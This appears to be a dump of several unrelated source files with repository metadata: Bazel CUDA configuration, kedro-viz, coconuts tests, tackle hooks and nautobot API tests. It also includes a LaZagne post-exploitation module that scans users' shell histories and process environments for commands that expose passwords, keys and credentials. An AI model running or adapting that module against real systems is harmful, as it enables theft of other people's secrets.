  for cap in compute_capabilities:
    flags.append("--cuda-gpu-arch=sm_" + cap.replace(".", ""))
  return str(flags)
def _create_local_cuda_repository(repository_ctx):
  """Creates the repository containing files set up to build with CUDA."""
  cuda_config = _get_cuda_config(repository_ctx)
  cudnn_header_dir = _find_cudnn_header_dir(repository_ctx,
                                            cuda_config.cudnn_install_basedir)
  # Set up symbolic links for the cuda toolkit by creating genrules to do
  # symlinking. We create one genrule for each directory we want to track under
  # cuda_toolkit_path
  cuda_toolkit_path = cuda_config.cuda_toolkit_path
  cuda_include_path = cuda_toolkit_path + "/include"
  genrules = [_symlink_genrule_for_dir(repository_ctx,
      cuda_include_path, "cuda/include", "cuda-include")]
  genrules.append(_symlink_genrule_for_dir(repository_ctx,
      cuda_toolkit_path + "/nvvm", "cuda/nvvm", "cuda-nvvm"))
  genrules.append(_symlink_genrule_for_dir(repository_ctx,
      cuda_toolkit_path + "/extras/CUPTI/include",
      "cuda/extras/CUPTI/include", "cuda-extras"))
  # Libraries are symlinked individually (explicit src/dest lists) rather than
  # per-directory, since they are scattered across the toolkit install.
  cuda_libs = _find_libs(repository_ctx, cuda_config)
  cuda_lib_src = []
  cuda_lib_dest = []
  for lib in cuda_libs.values():
    cuda_lib_src.append(lib.path)
    cuda_lib_dest.append("cuda/lib/" + lib.file_name)
  genrules.append(_symlink_genrule_for_dir(repository_ctx, None, "", "cuda-lib",
                                           cuda_lib_src, cuda_lib_dest))
  # Set up the symbolic links for cudnn if cudnn was was not installed to
  # CUDA_TOOLKIT_PATH.
  included_files = _read_dir(repository_ctx, cuda_include_path).replace(
      cuda_include_path, '').splitlines()
  if '/cudnn.h' not in included_files:
    genrules.append(_symlink_genrule_for_dir(repository_ctx, None,
        "cuda/include/", "cudnn-include", [cudnn_header_dir + "/cudnn.h"],
        ["cudnn.h"]))
  else:
    # cudnn.h already lives under the toolkit include dir, so the
    # "cudnn-include" target only needs to exist, with no sources.
    genrules.append(
        'filegroup(\n' +
        ' name = "cudnn-include",\n' +
        ' srcs = [],\n' +
        ')\n'
    )
  # Set up BUILD file for cuda/
  _tpl(repository_ctx, "cuda:build_defs.bzl",
       {
           "%{cuda_is_configured}": "True",
           "%{cuda_extra_copts}": _compute_cuda_extra_copts(
               repository_ctx, cuda_config.compute_capabilities),
       })
  _tpl(repository_ctx, "cuda:BUILD",
       {
           "%{cuda_driver_lib}": cuda_libs["cuda"].file_name,
           "%{cudart_static_lib}": cuda_libs["cudart_static"].file_name,
           "%{cudart_static_linkopt}": _cudart_static_linkopt(
               cuda_config.cpu_value),
           "%{cudart_lib}": cuda_libs["cudart"].file_name,
           "%{cublas_lib}": cuda_libs["cublas"].file_name,
           "%{cusolver_lib}": cuda_libs["cusolver"].file_name,
           "%{cudnn_lib}": cuda_libs["cudnn"].file_name,
           "%{cufft_lib}": cuda_libs["cufft"].file_name,
           "%{curand_lib}": cuda_libs["curand"].file_name,
           "%{cupti_lib}": cuda_libs["cupti"].file_name,
           "%{cuda_include_genrules}": "\n".join(genrules),
           "%{cuda_headers}": ('":cuda-include",\n' +
                               ' ":cudnn-include",')
       })
  # Set up crosstool/
  cc = find_cc(repository_ctx)
  host_compiler_includes = _host_compiler_includes(repository_ctx, cc)
  cuda_defines = {
      "%{cuda_include_path}": _cuda_include_path(repository_ctx,
                                                 cuda_config),
      "%{host_compiler_includes}": host_compiler_includes,
  }
  if _use_cuda_clang(repository_ctx):
    # clang compiles CUDA directly; no wrapper script is needed.
    cuda_defines["%{clang_path}"] = cc
    _tpl(repository_ctx, "crosstool:BUILD", {"%{linker_files}": ":empty"})
    _tpl(repository_ctx, "crosstool:CROSSTOOL_clang", cuda_defines, out="crosstool/CROSSTOOL")
  else:
    # nvcc path: compilation goes through the wrapper driver script below.
    nvcc_path = str(repository_ctx.path("%s/bin/nvcc%s" %
        (cuda_config.cuda_toolkit_path,
         ".exe" if cuda_config.cpu_value == "Windows" else "")))
    _tpl(repository_ctx, "crosstool:BUILD",
         {"%{linker_files}": ":crosstool_wrapper_driver_is_not_gcc"})
    _tpl(repository_ctx, "crosstool:CROSSTOOL_nvcc", cuda_defines, out="crosstool/CROSSTOOL")
    _tpl(repository_ctx,
         "crosstool:clang/bin/crosstool_wrapper_driver_is_not_gcc",
         {
             "%{cpu_compiler}": str(cc),
             "%{cuda_version}": cuda_config.cuda_version,
             "%{nvcc_path}": nvcc_path,
             "%{gcc_host_compiler_path}": str(cc),
             "%{cuda_compute_capabilities}": ", ".join(
                 ["\"%s\"" % c for c in cuda_config.compute_capabilities]),
         })
  # Set up cuda_config.h, which is used by
  # tensorflow/stream_executor/dso_loader.cc.
  _tpl(repository_ctx, "cuda:cuda_config.h",
       {
           "%{cuda_version}": cuda_config.cuda_version,
           "%{cudnn_version}": cuda_config.cudnn_version,
           "%{cuda_compute_capabilities}": ",".join(
               ["CudaVersion(\"%s\")" % c
                for c in cuda_config.compute_capabilities]),
           "%{cuda_toolkit_path}": cuda_config.cuda_toolkit_path,
       }, "cuda/cuda/cuda_config.h")
def _create_remote_cuda_repository(repository_ctx, remote_config_repo):
  """Creates pointers to a remotely configured repo set up to build with CUDA."""
  # build_defs.bzl is still generated locally so cuda_is_configured() and the
  # extra copts reflect this host's compute-capability settings.
  _tpl(repository_ctx, "cuda:build_defs.bzl",
       {
           "%{cuda_is_configured}": "True",
           "%{cuda_extra_copts}": _compute_cuda_extra_copts(
               repository_ctx, _compute_capabilities(repository_ctx)),
       })
  # The BUILD files simply alias targets in the remote config repository.
  _tpl(repository_ctx, "cuda:remote.BUILD",
       {
           "%{remote_cuda_repo}": remote_config_repo,
       }, "cuda/BUILD")
  _tpl(repository_ctx, "crosstool:remote.BUILD", {
      "%{remote_cuda_repo}": remote_config_repo,
  }, "crosstool/BUILD")
def _cuda_autoconf_impl(repository_ctx):
  """Implementation of the cuda_autoconf repository rule."""
  if not _enable_cuda(repository_ctx):
    # CUDA disabled: generate stubs plus an actionable --config=cuda error.
    _create_dummy_repository(repository_ctx)
    return
  remote_repo = repository_ctx.os.environ.get(_TF_CUDA_CONFIG_REPO)
  if remote_repo != None:
    _create_remote_cuda_repository(repository_ctx, remote_repo)
  else:
    _create_local_cuda_repository(repository_ctx)
cuda_configure = repository_rule(
implementation = _cuda_autoconf_impl,
environ = [
_GCC_HOST_COMPILER_PATH,
"TF_NEED_CUDA",
_CUDA_TOOLKIT_PATH,
_CUDNN_INSTALL_PATH,
_TF_CUDA_VERSION,
_TF_CUDNN_VERSION,
_TF_CUDA_COMPUTE_CAPABILITIES,
_TF_CUDA_CONFIG_REPO,
],
)
"""Detects and configures the local CUDA toolchain.
Add the following to your WORKSPACE FILE:
```python
cuda_configure(name = "local_config_cuda")
```
Args:
name: A unique name for this workspace rule.
"""
| 38.503274
| 102
| 0.684451
|
4a0f485d2544a0aec8d690e7248a3b5b0548047b
| 2,411
|
py
|
Python
|
package/kedro_viz/data_access/repositories/catalog.py
|
deepyaman/kedro-viz
|
3aef612b6dd405baac0bde68ef37c1f39eb6fa34
|
[
"BSD-3-Clause-Clear",
"Apache-2.0"
] | null | null | null |
package/kedro_viz/data_access/repositories/catalog.py
|
deepyaman/kedro-viz
|
3aef612b6dd405baac0bde68ef37c1f39eb6fa34
|
[
"BSD-3-Clause-Clear",
"Apache-2.0"
] | null | null | null |
package/kedro_viz/data_access/repositories/catalog.py
|
deepyaman/kedro-viz
|
3aef612b6dd405baac0bde68ef37c1f39eb6fa34
|
[
"BSD-3-Clause-Clear",
"Apache-2.0"
] | null | null | null |
"""`kedro_viz.data_access.repositories.catalog` defines interface to
centralise access to Kedro data catalog."""
# pylint: disable=missing-class-docstring,missing-function-docstring,protected-access
from typing import Optional
from kedro.io import AbstractDataSet, DataCatalog, DataSetNotFoundError
from kedro_viz.constants import KEDRO_VERSION
class CatalogRepository:
    """Centralised access point for the project's Kedro ``DataCatalog``."""

    _catalog: DataCatalog

    def __init__(self):
        # Lazily-built cache: dataset full name -> catalog layer (or None).
        self._layers_mapping = None

    def get_catalog(self) -> DataCatalog:
        return self._catalog

    def set_catalog(self, value: DataCatalog):
        self._catalog = value

    @staticmethod
    def strip_encoding(dataset_name: str) -> str:
        """Drop any transcoding suffix: ``"ds@pandas"`` -> ``"ds"``."""
        return dataset_name.split("@")[0]

    @property
    def layers_mapping(self):
        """Return layer mapping: dataset_full_name -> layer it belongs to in the catalog"""
        if self._layers_mapping is None:
            if self._catalog.layers is None:
                # No layers declared in the catalog: every dataset maps to None.
                self._layers_mapping = {
                    self.strip_encoding(name): None
                    for name in self._catalog._data_sets
                }
            else:
                mapping = {}
                for layer, dataset_names in self._catalog.layers.items():
                    for name in dataset_names:
                        mapping[self.strip_encoding(name)] = layer
                self._layers_mapping = mapping
        return self._layers_mapping

    def get_dataset(self, dataset_name: str) -> Optional[AbstractDataSet]:
        """Look up a dataset object by name, or None if it is not registered."""
        dataset_obj: Optional[AbstractDataSet]
        if not KEDRO_VERSION.match(">=0.16.0"):
            # Older kedro has no _get_dataset helper.
            return self._catalog._data_sets.get(dataset_name)  # pragma: no cover
        try:
            dataset_obj = self._catalog._get_dataset(dataset_name)
        except DataSetNotFoundError:  # pragma: no cover
            dataset_obj = None
        return dataset_obj

    def get_layer_for_dataset(self, dataset_name: str) -> Optional[str]:
        return self.layers_mapping.get(self.strip_encoding(dataset_name))

    @staticmethod
    def is_dataset_param(dataset_name: str) -> bool:
        """Return whether a dataset is a parameter"""
        lowered = dataset_name.lower()
        return lowered.startswith("params:") or dataset_name == "parameters"
| 34.942029
| 91
| 0.641228
|
4a0f4a43e98a7b731ead7e1fceb0bd7f6a42564c
| 3,021
|
py
|
Python
|
tests/test_learners_bruteforce.py
|
owahltinez/coconuts
|
20aa29580c0114e88da70ba1e806becd2243e57b
|
[
"MIT"
] | 1
|
2021-09-10T01:56:01.000Z
|
2021-09-10T01:56:01.000Z
|
tests/test_learners_bruteforce.py
|
owahltinez/coconuts
|
20aa29580c0114e88da70ba1e806becd2243e57b
|
[
"MIT"
] | null | null | null |
tests/test_learners_bruteforce.py
|
owahltinez/coconuts
|
20aa29580c0114e88da70ba1e806becd2243e57b
|
[
"MIT"
] | null | null | null |
""" Test Convolution Module """
import sys
import cProfile
import warnings
from pstats import Stats
from unittest import TestCase, main
from bananas.sampledata.local import load_boston, load_titanic
from bananas.sampledata.synthetic import new_labels, new_line, new_3x3, new_poly, new_trig
from bananas.hyperparameters.bruteforce import BruteForce
from coconuts.learners.convolution import CNNClassifier, CNNRegressor
from coconuts.learners.linear import LogisticRegression, LinearRegressor
from coconuts.learners.multilayer import MLPClassifier, MLPRegressor
# Show traceback for all warnings
from bananas.utils.misc import warn_with_traceback
# Route every emitted warning through a handler that prints its stack trace.
warnings.showwarning = warn_with_traceback
# pylint: disable=missing-docstring
class TestUtils(TestCase):
    """Brute-force hyperparameter-search smoke tests for coconuts learners."""

    @classmethod
    def setUpClass(cls):
        # Profile the whole test class; stats are printed in tearDownClass.
        cls.profiler = cProfile.Profile()
        cls.profiler.enable()

    @classmethod
    def tearDownClass(cls):
        profile_stats = Stats(cls.profiler)
        profile_stats.strip_dirs()
        profile_stats.sort_stats("cumtime")
        profile_stats.print_stats(20)

    def test_learner_synthetic(self):
        seed = dict(random_seed=0)
        classifiers = [LogisticRegression, MLPClassifier, CNNClassifier]
        regressors = [LinearRegressor, MLPRegressor, CNNRegressor]
        cases = [
            (regressors, new_line(**seed), 0.95),  # Approximate a line
            (regressors, new_trig(**seed), 0.75),  # Approximate a sine curve
            (regressors, new_poly(**seed), 0.85),  # Approximate a 4th deg. poly
            (classifiers, new_labels(**seed), 0.80),  # Correctly guess labels
            (regressors, new_3x3(**seed), 0.90),  # 3x3 fuzzy matrix
        ]
        for learners, dataset, target_score in cases:
            pipeline = BruteForce(dataset, learners, n_jobs=4)
            history = pipeline.train(dataset.input_fn, max_score=target_score, progress=True)
            self.assertGreaterEqual(max(history.scores), target_score, dataset.name)

    def test_learner_datasets(self):
        seed = dict(random_seed=0)
        classifiers = [LogisticRegression, MLPClassifier, CNNClassifier]
        regressors = [LinearRegressor, MLPRegressor, CNNRegressor]
        cases = [
            (regressors, load_boston(**seed), 0.85),  # Boston housing dataset
            (classifiers, load_titanic(**seed), 0.75),  # Titanic dataset
        ]
        for learners, (dataset, test_ds), target_score in cases:
            pipeline = BruteForce(dataset, learners, n_jobs=4)
            history = pipeline.train(dataset.input_fn, max_score=target_score, progress=True)
            # Score on the held-out split as well as on the training history.
            test_score = pipeline.score(*test_ds[:])
            self.assertGreaterEqual(max(history.scores), target_score, dataset.name)
            print("%s\t%.3f\t%.3f" % (dataset.name, max(history.scores), test_score))
# Run the unittest CLI when executed directly; propagate its exit status.
if __name__ == "__main__":
    sys.exit(main())
| 41.383562
| 93
| 0.703078
|
4a0f4a52fe3460cbbb04e9ddce257bbf689aaeab
| 910
|
py
|
Python
|
tackle/providers/system/hooks/strings.py
|
geometry-labs/tackle-box
|
83424a10416955ba983f0c14ec89bd79673a4282
|
[
"BSD-3-Clause"
] | 1
|
2021-04-13T23:10:11.000Z
|
2021-04-13T23:10:11.000Z
|
tackle/providers/system/hooks/strings.py
|
geometry-labs/tackle-box
|
83424a10416955ba983f0c14ec89bd79673a4282
|
[
"BSD-3-Clause"
] | 4
|
2021-01-27T00:06:12.000Z
|
2021-02-12T01:20:32.000Z
|
tackle/providers/system/hooks/strings.py
|
geometry-labs/tackle-box
|
83424a10416955ba983f0c14ec89bd79673a4282
|
[
"BSD-3-Clause"
] | 1
|
2021-05-07T05:07:29.000Z
|
2021-05-07T05:07:29.000Z
|
"""String hooks."""
import logging
from typing import List
from tackle.models import BaseHook, Field
logger = logging.getLogger(__name__)
class SplitHook(BaseHook):
    """Hook splitting a string into a list on a separator.

    Example: ``"a.b.c"`` with the default separator yields ``["a", "b", "c"]``.
    """
    hook_type: str = 'split'
    # Despite the description text, a single string is what gets split here.
    input: str = Field(..., description="A list of string to split or just a string")
    separator: str = Field(".", description="String separator")
    # Positional-argument mapping: the first unnamed argument fills ``input``.
    _args: list = ['input']
    def execute(self):
        # Delegate to str.split; returns the list of parts.
        return self.input.split(self.separator)
class JoinHook(BaseHook):
    """Join a list of strings with a separator.

    Example: ``["a", "b"]`` with the default separator yields ``"a.b"``.
    """
    hook_type: str = 'join'
    # render_by_default=True — presumably list items are rendered as templates
    # before joining; confirm against the tackle Field documentation.
    input: List[str] = Field(
        ..., description="A list of strings to join.", render_by_default=True
    )
    separator: str = Field('.', description="String separator.")
    # Positional-argument mapping: the first unnamed argument fills ``input``.
    _args: list = ['input']
    def execute(self):
        # Delegate to str.join on the configured separator.
        return self.separator.join(self.input)
| 25.277778
| 85
| 0.659341
|
4a0f4a838168457f5e478cc830fedc5a84789ff6
| 3,852
|
py
|
Python
|
Post-Exploitation/LaZagne/Linux/lazagne/softwares/sysadmin/cli.py
|
FOGSEC/TID3xploits
|
b57d8bae454081a3883a5684679e2a329e72d6e5
|
[
"MIT"
] | 5
|
2018-01-15T13:58:40.000Z
|
2022-02-17T02:38:58.000Z
|
Post-Exploitation/LaZagne/Linux/lazagne/softwares/sysadmin/cli.py
|
bhattsameer/TID3xploits
|
b57d8bae454081a3883a5684679e2a329e72d6e5
|
[
"MIT"
] | null | null | null |
Post-Exploitation/LaZagne/Linux/lazagne/softwares/sysadmin/cli.py
|
bhattsameer/TID3xploits
|
b57d8bae454081a3883a5684679e2a329e72d6e5
|
[
"MIT"
] | 4
|
2019-06-21T07:51:11.000Z
|
2020-11-04T05:20:09.000Z
|
from lazagne.config.constant import *
from lazagne.config.write_output import print_debug
from lazagne.config.moduleInfo import ModuleInfo
from lazagne.config import homes
from ConfigParser import ConfigParser
import psutil
import os
import pwd
class Cli(ModuleInfo):
    """Scans shell history files for commands that may contain credentials.

    The scan is deliberately best-effort: unreadable files and vanished
    processes are skipped silently. Bare ``except:`` clauses were narrowed to
    ``except Exception:`` so KeyboardInterrupt/SystemExit still propagate.
    """

    def __init__(self):
        options = {'command': '-C', 'action': 'store_true', 'dest': 'cli', 'help': 'cli'}
        suboptions = []
        ModuleInfo.__init__(self, 'cli', 'sysadmin', options, suboptions)

    def get_files(self):
        """Yield (user, history_file) pairs, without duplicates.

        Sources: well-known shell history files in home directories, plus any
        HISTFILE advertised in the environment of a running process.
        """
        known = set()
        for user, histfile in homes.users(file=['.history', '.sh_history', '.bash_history', '.zhistory']):
            yield user, histfile
            known.add(histfile)

        for process in psutil.process_iter():
            try:
                environ = process.environ()
                user = process.username()
            except Exception:
                # Process may have exited or be inaccessible; skip it.
                continue

            if 'HISTFILE' not in environ:
                continue

            histfile = environ['HISTFILE']
            if histfile in ('/dev/zero', '/dev/null'):
                # History explicitly disabled for this process.
                continue

            if histfile.startswith('~/'):
                # Expand "~" against the process owner's home directory.
                try:
                    home = pwd.getpwuid(process.uids().effective).pw_dir
                except Exception:
                    continue
                histfile = os.path.join(home, histfile[2:])

            if os.path.isfile(histfile) and histfile not in known:
                yield user, histfile
                known.add(histfile)

    def get_lines(self):
        """Yield (user, command_line) pairs from all history sources, deduplicated."""
        known = set()
        for user, plainfile in self.get_files():
            try:
                with open(plainfile) as infile:
                    for line in infile.readlines():
                        line = line.strip()
                        if line.startswith('#'):
                            # Comment or shell timestamp marker.
                            continue
                        try:
                            int(line)
                            # A bare number (history index) carries no command.
                            continue
                        except Exception:
                            pass
                        # Collapse whitespace runs so duplicates compare equal.
                        line = ' '.join(x for x in line.split() if x)
                        if line not in known:
                            yield user, line
                            known.add(line)
            except Exception:
                # Unreadable file (permissions, encoding); best-effort scan.
                pass

        # Midnight Commander stores its command history in an INI-style file.
        for user, histfile in homes.users(file='.local/share/mc/history'):
            parser = ConfigParser()
            try:
                parser.read(histfile)
            except Exception:
                continue

            try:
                for i in parser.options('cmdline'):
                    line = parser.get('cmdline', i)
                    if line not in known:
                        yield user, line
                        known.add(line)
            except Exception:
                # No [cmdline] section or malformed file.
                pass

    def suspicious(self, user, line):
        """Yield a finding dict for *line* if it matches any credential marker set."""
        markers = [
            ('sshpass', '-p'),
            ('chpasswd',),
            ('openssl', 'passwd'),
            ('sudo', '-S'),
            ('mysql', '-p'),
            ('psql', 'postgresql://'),
            ('pgcli', 'postgresql://'),
            ('ssh', '-i'),
            ('sqlplus', '/'),
            ('xfreerdp', '/p'),
            ('vncviewer', 'passwd'),
            ('vncviewer', 'PasswordFile'),
            ('mount.cifs', 'credentials'),
            ('pass=',),
            ('smbclient',),
            ('ftp', '@'),
            ('wget', '@'),
            ('curl', '@'),
            ('curl', '-u'),
            ('wget', '-password')
        ]
        for marker in markers:
            # All tokens of a marker must appear somewhere in the command line.
            if all((x in line) for x in marker):
                yield {
                    'User': user,
                    'Cmd': line
                }

    def run(self, software_name=None):
        """Entry point: return every suspicious command found in history files."""
        all_cmds = []
        for user, line in self.get_lines():
            for cmd in self.suspicious(user, line):
                all_cmds.append(cmd)
        return all_cmds
| 30.816
| 106
| 0.438474
|
4a0f4aa8bf0510d95032cd3be17a7d6082405463
| 67,168
|
py
|
Python
|
nautobot/extras/tests/test_api.py
|
psmware-ltd/nautobot
|
ac516287fb8edcc3482bd011839de837c6bbf0df
|
[
"Apache-2.0"
] | 384
|
2021-02-24T01:40:40.000Z
|
2022-03-30T10:30:59.000Z
|
nautobot/extras/tests/test_api.py
|
psmware-ltd/nautobot
|
ac516287fb8edcc3482bd011839de837c6bbf0df
|
[
"Apache-2.0"
] | 1,067
|
2021-02-24T00:58:08.000Z
|
2022-03-31T23:38:23.000Z
|
nautobot/extras/tests/test_api.py
|
psmware-ltd/nautobot
|
ac516287fb8edcc3482bd011839de837c6bbf0df
|
[
"Apache-2.0"
] | 128
|
2021-02-24T02:45:16.000Z
|
2022-03-20T18:48:36.000Z
|
from datetime import datetime, timedelta
import os.path
import uuid
from unittest import mock, skipIf
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.contenttypes.models import ContentType
from django.http import Http404
from django.test import override_settings
from django.urls import reverse
from django.utils.timezone import make_aware, now
from rest_framework import status
from nautobot.dcim.models import (
Device,
DeviceRole,
DeviceType,
Manufacturer,
Rack,
RackGroup,
RackRole,
Site,
)
from nautobot.extras.api.views import JobViewSet
from nautobot.extras.choices import JobExecutionType, SecretsGroupAccessTypeChoices, SecretsGroupSecretTypeChoices
from nautobot.extras.models import (
ComputedField,
ConfigContext,
ConfigContextSchema,
CustomField,
CustomLink,
ExportTemplate,
GitRepository,
GraphQLQuery,
ImageAttachment,
JobLogEntry,
JobResult,
Relationship,
RelationshipAssociation,
ScheduledJob,
Secret,
SecretsGroup,
SecretsGroupAssociation,
Status,
Tag,
Webhook,
)
from nautobot.extras.jobs import Job, BooleanVar, IntegerVar, StringVar, ObjectVar
from nautobot.utilities.testing import APITestCase, APIViewTestCases
from nautobot.utilities.testing.utils import disable_warnings
# Resolve the active user model once (supports a swapped AUTH_USER_MODEL).
User = get_user_model()
# Directory of this test module; used to locate file-based fixtures.
THIS_DIRECTORY = os.path.dirname(__file__)
class AppTest(APITestCase):
    """Sanity check that the extras API root is reachable."""

    def test_root(self):
        root_url = reverse("extras-api:api-root")
        resp = self.client.get("{}?format=api".format(root_url), **self.header)
        self.assertEqual(resp.status_code, 200)
#
# Computed Fields
#
class ComputedFieldTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for ComputedField, plus opt-in rendering via ?include=."""
    model = ComputedField
    brief_fields = [
        "content_type",
        "description",
        "display",
        "fallback_value",
        "id",
        "label",
        "slug",
        "template",
        "url",
        "weight",
    ]
    # POST payloads; the last one omits "slug" to exercise auto-generation
    # from the label (see slug_source below).
    create_data = [
        {
            "content_type": "dcim.site",
            "slug": "cf4",
            "label": "Computed Field 4",
            "template": "{{ obj.name }}",
            "fallback_value": "error",
        },
        {
            "content_type": "dcim.site",
            "slug": "cf5",
            "label": "Computed Field 5",
            "template": "{{ obj.name }}",
            "fallback_value": "error",
        },
        {
            "content_type": "dcim.site",
            "slug": "cf6",
            "label": "Computed Field 6",
            "template": "{{ obj.name }}",
        },
        {
            "content_type": "dcim.site",
            "label": "Computed Field 7",
            "template": "{{ obj.name }}",
            "fallback_value": "error",
        },
    ]
    update_data = {
        "content_type": "dcim.site",
        "slug": "cf1",
        "label": "My Computed Field",
    }
    bulk_update_data = {
        "description": "New description",
    }
    # Slugs are derived from the label when not supplied.
    slug_source = "label"
    @classmethod
    def setUpTestData(cls):
        site_ct = ContentType.objects.get_for_model(Site)
        # NOTE(review): the trailing commas after the next two create() calls
        # build throwaway 1-tuples; harmless, but likely unintentional.
        ComputedField.objects.create(
            slug="cf1",
            label="Computed Field One",
            template="{{ obj.name }}",
            fallback_value="error",
            content_type=site_ct,
        ),
        ComputedField.objects.create(
            slug="cf2",
            label="Computed Field Two",
            template="{{ obj.name }}",
            fallback_value="error",
            content_type=site_ct,
        ),
        ComputedField.objects.create(
            slug="cf3",
            label="Computed Field Three",
            template="{{ obj.name }}",
            fallback_value="error",
            content_type=site_ct,
        )
        # Target object whose computed fields are rendered in the test below.
        cls.site = Site.objects.create(name="Site 1", slug="site-1")
    def test_computed_field_include(self):
        """Test that explicitly including a computed field behaves as expected."""
        self.add_permissions("dcim.view_site")
        url = reverse("dcim-api:site-detail", kwargs={"pk": self.site.pk})
        # First get the object without computed fields.
        response = self.client.get(url, **self.header)
        self.assertNotIn("computed_fields", response.json())
        # Now get it with computed fields.
        params = {"include": "computed_fields"}
        response = self.client.get(url, data=params, **self.header)
        self.assertIn("computed_fields", response.json())
class ConfigContextTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for ConfigContext, plus rendering and schema validation."""
    model = ConfigContext
    brief_fields = ["display", "id", "name", "url"]
    create_data = [
        {
            "name": "Config Context 4",
            "data": {"more_foo": True},
        },
        {
            "name": "Config Context 5",
            "data": {"more_bar": False},
        },
        {
            "name": "Config Context 6",
            "data": {"more_baz": None},
        },
    ]
    bulk_update_data = {
        "description": "New description",
    }
    @classmethod
    def setUpTestData(cls):
        # Three global contexts with increasing weight; weight decides
        # precedence when keys collide during rendering.
        ConfigContext.objects.create(name="Config Context 1", weight=100, data={"foo": 123})
        ConfigContext.objects.create(name="Config Context 2", weight=200, data={"bar": 456})
        ConfigContext.objects.create(name="Config Context 3", weight=300, data={"baz": 789})
    def test_render_configcontext_for_object(self):
        """
        Test rendering config context data for a device.
        """
        manufacturer = Manufacturer.objects.create(name="Manufacturer 1", slug="manufacturer-1")
        devicetype = DeviceType.objects.create(manufacturer=manufacturer, model="Device Type 1", slug="device-type-1")
        devicerole = DeviceRole.objects.create(name="Device Role 1", slug="device-role-1")
        site = Site.objects.create(name="Site-1", slug="site-1")
        device = Device.objects.create(name="Device 1", device_type=devicetype, device_role=devicerole, site=site)
        # Test default config contexts (created at test setup)
        rendered_context = device.get_config_context()
        self.assertEqual(rendered_context["foo"], 123)
        self.assertEqual(rendered_context["bar"], 456)
        self.assertEqual(rendered_context["baz"], 789)
        # Add another context specific to the site
        configcontext4 = ConfigContext(name="Config Context 4", data={"site_data": "ABC"})
        configcontext4.save()
        configcontext4.sites.add(site)
        rendered_context = device.get_config_context()
        self.assertEqual(rendered_context["site_data"], "ABC")
        # Override one of the default contexts
        configcontext5 = ConfigContext(name="Config Context 5", weight=2000, data={"foo": 999})
        configcontext5.save()
        configcontext5.sites.add(site)
        rendered_context = device.get_config_context()
        self.assertEqual(rendered_context["foo"], 999)
        # Add a context which does NOT match our device and ensure it does not apply
        site2 = Site.objects.create(name="Site 2", slug="site-2")
        configcontext6 = ConfigContext(name="Config Context 6", weight=2000, data={"bar": 999})
        configcontext6.save()
        configcontext6.sites.add(site2)
        rendered_context = device.get_config_context()
        self.assertEqual(rendered_context["bar"], 456)
    def test_schema_validation_pass(self):
        """
        Given a config context schema
        And a config context that conforms to that schema
        Assert that the config context passes schema validation via full_clean()
        """
        schema = ConfigContextSchema.objects.create(
            name="Schema 1", slug="schema-1", data_schema={"type": "object", "properties": {"foo": {"type": "string"}}}
        )
        self.add_permissions("extras.add_configcontext")
        data = {"name": "Config Context with schema", "weight": 100, "data": {"foo": "bar"}, "schema": str(schema.pk)}
        response = self.client.post(self._get_list_url(), data, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_201_CREATED)
        self.assertEqual(response.data["schema"]["id"], str(schema.pk))
    def test_schema_validation_fails(self):
        """
        Given a config context schema
        And a config context that *does not* conform to that schema
        Assert that the config context fails schema validation via full_clean()
        """
        schema = ConfigContextSchema.objects.create(
            name="Schema 1", slug="schema-1", data_schema={"type": "object", "properties": {"foo": {"type": "integer"}}}
        )
        self.add_permissions("extras.add_configcontext")
        data = {
            "name": "Config Context with bad schema",
            "weight": 100,
            "data": {"foo": "bar"},
            "schema": str(schema.pk),
        }
        response = self.client.post(self._get_list_url(), data, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_400_BAD_REQUEST)
class ConfigContextSchemaTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for the ConfigContextSchema model."""

    model = ConfigContextSchema
    brief_fields = ["display", "id", "name", "slug", "url"]
    create_data = [
        {
            "name": "Schema 4",
            "slug": "schema-4",
            "data_schema": {"type": "object", "properties": {"foo": {"type": "string"}}},
        },
        {
            "name": "Schema 5",
            "slug": "schema-5",
            "data_schema": {"type": "object", "properties": {"bar": {"type": "string"}}},
        },
        {
            "name": "Schema 6",
            "slug": "schema-6",
            "data_schema": {"type": "object", "properties": {"buz": {"type": "string"}}},
        },
        # No slug given: exercises auto-generation from the name (see slug_source).
        {
            "name": "Schema 7",
            "data_schema": {"type": "object", "properties": {"buz": {"type": "string"}}},
        },
    ]
    bulk_update_data = {
        "description": "New description",
    }
    choices_fields = []
    slug_source = "name"

    @classmethod
    def setUpTestData(cls):
        # Fix: the original statements each ended in a stray trailing comma,
        # silently wrapping every create() result in a discarded one-element tuple.
        ConfigContextSchema.objects.create(
            name="Schema 1", slug="schema-1", data_schema={"type": "object", "properties": {"foo": {"type": "string"}}}
        )
        ConfigContextSchema.objects.create(
            name="Schema 2", slug="schema-2", data_schema={"type": "object", "properties": {"bar": {"type": "string"}}}
        )
        ConfigContextSchema.objects.create(
            name="Schema 3", slug="schema-3", data_schema={"type": "object", "properties": {"baz": {"type": "string"}}}
        )
class ContentTypeTest(APITestCase):
    """Read-only API tests for Django ContentType objects."""

    @override_settings(EXEMPT_VIEW_PERMISSIONS=["contenttypes.contenttype"])
    def test_list_objects(self):
        """Listing content types returns every ContentType in the database."""
        expected_total = ContentType.objects.count()
        list_url = reverse("extras-api:contenttype-list")
        response = self.client.get(list_url, **self.header)
        self.assertHttpStatus(response, status.HTTP_200_OK)
        self.assertEqual(response.data["count"], expected_total)

    @override_settings(EXEMPT_VIEW_PERMISSIONS=["contenttypes.contenttype"])
    def test_get_object(self):
        """An individual content type can be retrieved by primary key."""
        instance = ContentType.objects.first()
        detail_url = reverse("extras-api:contenttype-detail", kwargs={"pk": instance.pk})
        response = self.client.get(detail_url, **self.header)
        self.assertHttpStatus(response, status.HTTP_200_OK)
class CreatedUpdatedFilterTest(APITestCase):
    """Verify the `created` / `last_updated` API filters (exact, __gte, __lte) using Rack objects."""
    def setUp(self):
        super().setUp()
        # Two racks in the same site/group/role; only their timestamps will differ.
        self.site1 = Site.objects.create(name="Test Site 1", slug="test-site-1")
        self.rackgroup1 = RackGroup.objects.create(site=self.site1, name="Test Rack Group 1", slug="test-rack-group-1")
        self.rackrole1 = RackRole.objects.create(name="Test Rack Role 1", slug="test-rack-role-1", color="ff0000")
        self.rack1 = Rack.objects.create(
            site=self.site1,
            group=self.rackgroup1,
            role=self.rackrole1,
            name="Test Rack 1",
            u_height=42,
        )
        self.rack2 = Rack.objects.create(
            site=self.site1,
            group=self.rackgroup1,
